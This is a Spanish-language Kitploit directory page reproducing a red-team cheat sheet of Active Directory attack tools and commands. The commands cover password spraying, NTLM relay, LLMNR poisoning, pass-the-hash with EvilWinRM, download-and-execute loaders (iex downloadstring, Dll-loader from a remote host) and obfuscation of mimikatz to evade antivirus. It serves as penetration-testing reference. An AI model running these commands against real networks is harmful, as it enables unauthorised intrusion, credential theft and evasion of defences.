Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Pentest-Tools-Collection — Colección seleccionada de herramientas y comandos de seguridad ofensiva para ataques a Active Directory, C2, escalada de privilegios, ofuscación y pentesting web. | Kitploit
Herramientas/GitHubGitHub/luemmelsec/pentest-tools-collection
Escalada de PrivilegiosExplotaciónEvasión de IDS/IPSRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingRecursos Curados

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Desarrollo de Payloads
GitHubluemmelsec/pentest-tools-collection

Pentest-Tools-Collection

Colección seleccionada de herramientas y comandos de seguridad ofensiva para ataques a Active Directory, C2, escalada de privilegios, ofuscación y pentesting web.

Ver Repositorio
9061463hace 1 mesRevisado por Kitploit

Pentest-Tools-Collection

Active Directory

AMSI

https://amsi.fail/

Colecciones de herramientas

WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn

Import-Module .\WinPwn.ps1

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Ghostpack

https://github.com/GhostPack

Seatbelt, KeeThief, Rubeus, SharpUp ...

Powersploit

https://github.com/PowerShellMafia/PowerSploit

PowerView, PowerUp, Get-GPPPassword ...

Enumeración

Bloodhound

https://github.com/BloodHoundAD/BloodHound

SharpHound.exe -d testdomain.com -c all,gpolocalgroup

Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup

https://github.com/fox-it/BloodHound.py

bloodhound.py -c all

ADRecon

https://github.com/adrecon/ADRecon

Para ejecutar ADRecon en un host miembro del dominio.
PS C:\> .\ADRecon.ps1

Para ejecutar ADRecon en un host miembro del dominio como un usuario diferente.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

Para ejecutar ADRecon en un host no miembro usando LDAP.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>

Spraying-Toolkit

https://github.com/byt3bl33d3r/SprayingToolkit

Sprayer de Lync/Skype y OWA, generador de wordlists, conversor de esquemas de nombres, etc.

Spraying OWA
./atomizer.py owa contoso.com 'Fall2018' emails.txt

Spraying Lync
./atomizer lync contoso.com --user-as-pass usernames.txt

Modo de reconocimiento (recon)
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

MailSniper

https://github.com/dafthack/MailSniper

Atacar OWA y EWS
El esquema de nombres debería ser como testdomain.com\schmidta o aschmidt -> verifique el esquema con el módulo de msf

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Get-ADUsernameFromEWS -EmailList email-list.txt

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

msspray

https://github.com/0xZDH/msspray

Herramienta de enumeración y spray para O365

Solo enumera usuarios sin hacer spray. Necesita un archivo de texto con direcciones de correo completas [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose

MSOLSpray

https://github.com/dafthack/MSOLSpray

Sprayer de O365

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

ExchangeRelayX

https://github.com/quickbreach/ExchangeRelayX

Atacar EWS mediante autenticación NTLM sobre HTTP.

./exchangeRelayx.py -t https://mail.quickbreach.com

SharpView

https://github.com/tevora-threat/SharpView

Port de PowerView a .NET

SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password

CrossLinked

https://github.com/m8r0wn/CrossLinked

Recopilar direcciones de correo / usuarios

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

Post-explotación

impacket

https://github.com/SecureAuthCorp/impacket

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

Documentación oficial: https://mpgn.gitbook.io/crackmapexec/

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

EvilWinRM

https://github.com/mrnamp/EvilWinRM

Una herramienta para interactuar con la implementación de WS-Management de Microsoft, también conocida como PowerShell-Remoting, desde una máquina Linux.
También se puede usar para conectarse con un hash en lugar de una contraseña.

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099

También es capaz de ejecutar C#, DLLs o shellcode de donut directamente en memoria. Los ejecutables deben estar en la ruta configurada en el argumento -e.

Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Dll-loader -http -path http://10.11.12.13/evil.dll

Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin

También puede evadir AMSI, obtener tickets de Kerberos y mucho más ...

SharpRDP

https://github.com/rasta-mouse/SharpRDP

Ejecutar cosas a través de RDP. ¡El usuario recibirá una notificación si multi-RDP no está habilitado!

SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password

Inveigh

https://github.com/Kevin-Robertson/Inveigh

Herramienta de spoofing ADIDNS/LLMNR/mDNS/NBNS/DNS y man-in-the-middle para PowerShell

Import-Module Inveigh.psm1

Invoke-Inveigh -Consoleoutput Y

Responder

https://github.com/lgandx/Responder

Poisoner de LLMNR/NBT-NS/mDNS

./Responder.py -I eth0

C2

Covenant

https://github.com/cobbr/Covenant

PS-Empire

https://github.com/BC-SECURITY/Empire

PrivEsc

WinPEAS / LinPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SecWiki

https://github.com/SecWiki

Exploits para Linux y Windows

PowerShDll

https://github.com/p3nt4/PowerShdll

Powershell sin Powershell

rundll32 PowerShdll,main -w

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

UACME

https://github.com/hfiref0x/UACME

Watson

https://github.com/rasta-mouse/Watson

PrivescCheck

https://github.com/itm4n/PrivescCheck

Ofuscación

PEzor

https://github.com/phra/PEzor

Ofuscar binarios C / C++

Nuevo módulo -> fluctuación de ShellCode:

PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'

Ver https://twitter.com/phraaaaaaa/status/1453389564383404032?t=wcB-3NlNh9725L9_zRjdHg

Fork de Donut con Syscalls

https://github.com/S4ntiagoP/donut/tree/syscalls

Fork del generador de shellcode / PE de Donut con syscalls

amber

https://github.com/EgeBalci/amber

Ofuscar binarios C / C++

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

Ofuscador de scripts de PowerShell.

xencrypt / BetterXencrypt

https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt

AQUARMOURY (especialmente wraith)

https://github.com/slaeryan/AQUARMOURY

Colección de herramientas para evadir AV/EDR y demás

root@kitploit:~
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

Ofuscador y cifrador de scripts de PowerShell.

ISESteroids

https://www.powershellgallery.com/packages/ISESteroids/2.7.1.7

Colección de herramientas para PowerShell ISE. Posibilidades de ofuscación.

PS2EXE

https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

Convertir archivos PS1 a EXE.

Invoke-Sharploader

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

Un wrapper para binarios C# que cifra el payload y lo descifra en memoria.

Cifrar binario:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Cargar binario cifrado desde URL:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

Cargar binario cifrado desde disco con argumentos de línea de comandos:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

inceptor

https://github.com/klezVirus/inceptor

Ofuscador para C# y Powershell

Chimera

https://github.com/tokyoneon/Chimera

Ofuscador de scripts de PowerShell

InvisibilityCloak

https://github.com/xforcered/InvisibilityCloak

Ofuscador de ensamblados C#

ConfuserEx

https://github.com/yck1509/ConfuserEx

Ofuscador de ensamblados C#

Charlotte

https://github.com/9emin1/charlotte

Cargador de shellcode vía D-Invoke

AVCleaner

https://github.com/lleon1435/avcleaner

Ofuscador de código fuente C/C++

Varios

SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray

Web

JSFScan: https://github.com/KathanP19/JSFScan.sh

Descargar herramienta